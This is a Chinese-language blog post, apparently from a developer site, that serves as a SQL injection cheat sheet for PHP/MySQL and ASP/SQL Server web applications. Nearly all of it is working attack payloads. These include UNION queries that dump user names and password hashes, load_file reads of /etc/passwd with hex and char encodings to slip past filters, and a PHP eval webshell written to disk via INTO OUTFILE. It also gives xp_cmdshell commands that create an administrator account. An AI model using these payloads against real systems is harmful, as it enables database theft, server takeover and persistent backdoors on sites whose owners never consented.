sql注入

php+mysql

url: http://www.example.com/news.php?id=1

mysql 4.5x 及以上,支持UNION查询

判断注入点
1' and 1=1#
1' and 1=2#
返回所以数据,常用于搜索功能页面
1' or 1=1#
猜表名
1 and exists(select * from admin)
猜列名
1 and exists(select pwd from admin);

试探有几个变量
1' and 1=2 union select 1,2,3,4...#
尝试成功后,共7列,第6列用于显示数据
1' and 1=2 union select 1,2,3,4,5,user,7 from mysql.user

返回数据库版本信息
union select version()#
当前库名
union select database()#
数据库用户名
union select user()#
union select session_user()#
union select system_user()#
数据库用户的名字与密码,密码MD5加密写入
union select user, password from mysql.user#
读取文件,必须为文件路径全名,绝对路径
union select load_file('/etc/password')#
过滤了就用hex表示,过滤了空格就用“+”表示,windows斜杠要反过c:/www/
union select load_file(0x2F6574632F70617373776F7264)
load_file(char(47,101,116,99,47,112,97,115,115,119,100))
可以显示在日期,浏览量等地方,灵活读取,甚至hex()

最好replace一下,“<” 替换成”空格”
replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

写入一句话木马
select '<?php eval($_POST[cmd])?>'  into outfile 'c:/test.php';

information_schema.SCHEMATA表中的SCHEMA_NAME 查看所有的数据库
union select 0,0,SCHEMA_NAME from information_schema.SCHEMATA
information_schema.TABLES 表中的TABLE_NAME和TABLE_SCHEMA查看所有的表名和所在的数据库
select TABLE_NAME ,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA = "admin" 
information_schema.COLUMNS 表中的 COLUMN_NAME 查看表中的所有列名
select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= "admin"

mysql 3.x 版本不支持union

盲注
mid(string, offset, len)
一个一个字节尝试,每个字节最多255次
and ascii(mid(load_file('/etc/password'),0,1)=1
当然应该用二分的思想。

ASP+SQL Server

sql server支持union,而且可以多句查询,分号隔开就行了。
sql server的行注释为"--"
判断注入点
and 1=1--
' and 1=2--
暴露user,user为当前连接用户名,sql server内置变量,nvarchar类型,与int比较出错,暴露user
url;and user>0--
数据库名
url;and db_name()>0
sysobject是sql server的系统表,msysobjects是access的系统表,可以判断数据库类型
and (select count(*) from msysobjects)>0
 
 
and (select count(*) from msysobjects)>0
 
 
检索用户创建的表的个数
and select count(*) from sysobjects where Xtype='u' and status>0
 获取第一个表名 
 
and select Top 1 name from sysobjects where Xtype='u' and status>0
其他的表名
and select top 1 name from sysobjects where Xtype='u' and status>0 and name!='first table name'

获取列名
and select top 1 col_name(object_id('table name'),1) from sysobjects

读出列名的每一个字符
select top 1 asc(mid(col name, 1,1,)) form table name

使用存储过程xp_cmdshell
url;exec master.xp_cmdshell "net user test test /add"
url;exec master.xp_cmdshell "net localgroup administrators test /add"
数据库备份
;backup database 'database name' to disk='path'


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值